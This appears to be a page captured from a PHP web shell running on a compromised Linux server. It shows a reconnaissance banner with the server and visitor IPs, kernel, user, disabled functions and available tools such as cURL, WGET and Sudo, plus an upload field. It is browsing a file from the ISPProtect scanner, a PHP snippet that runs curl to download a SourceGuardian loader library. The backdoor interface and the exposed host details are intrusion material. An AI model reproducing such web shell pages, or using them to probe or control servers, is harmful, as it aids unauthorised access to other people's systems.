| Server IP : 81.2.241.106 / Your IP : 216.73.216.165 Web Server : Apache/2.4.67 (Debian) System : Linux tranq-f.bakta.org 5.10.0-45-amd64 #1 SMP Debian 5.10.259-1 (2026-07-02) x86_64 User : lisky ( 1002) PHP Version : 7.4.33 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /proc/self/root/opt/ispprotect/ |
Upload File : |
<?php
if(!function_exists('sg_load')) {
$sg_dir = __DIR__ . '/loader';
if(!is_dir($sg_dir)) {
mkdir($sg_dir, 0700);
chmod($sg_dir, 0700);
}
$phpver = phpversion();
$v = explode('.', $phpver);
$ver = $v[0] . '.' . (int)$v[1];
$os = strtolower(substr(php_uname(), 0, 3));
$thread_safe = (@constant('PHP_ZTS') || @constant('ZEND_THREAD_SAFE'));
$loader_file = 'ixed.' . $ver . ($thread_safe ? 'ts' : '') . '.' . $os;
$loader_url = 'https://www.sourceguardian.com/loaders/download.php?php_v=' . urlencode($phpver) . '&php_ts=' . ($thread_safe ? '1' : '0') . '&php_is=' . @constant('PHP_INT_SIZE') . '&os_s=' . urlencode(php_uname('s')) . '&os_r=' . urlencode(php_uname('r')) . '&os_m=' . urlencode(php_uname('m'));
if(!file_exists($sg_dir . '/' . $loader_file . '.so')) {
$out = null;
$ret = null;
exec('curl --output ' . escapeshellarg($sg_dir . '/' . $loader_file . '.so') . ' ' . escapeshellarg($loader_url) . ' >/dev/null 2>&1', $out, $ret);
if($ret !== 0) {
die('ERR');
} elseif(!file_exists($sg_dir . '/' . $loader_file . '.so')) {
die('ERR');
}
}
print $sg_dir . '/' . $loader_file . '.so';
exit;
}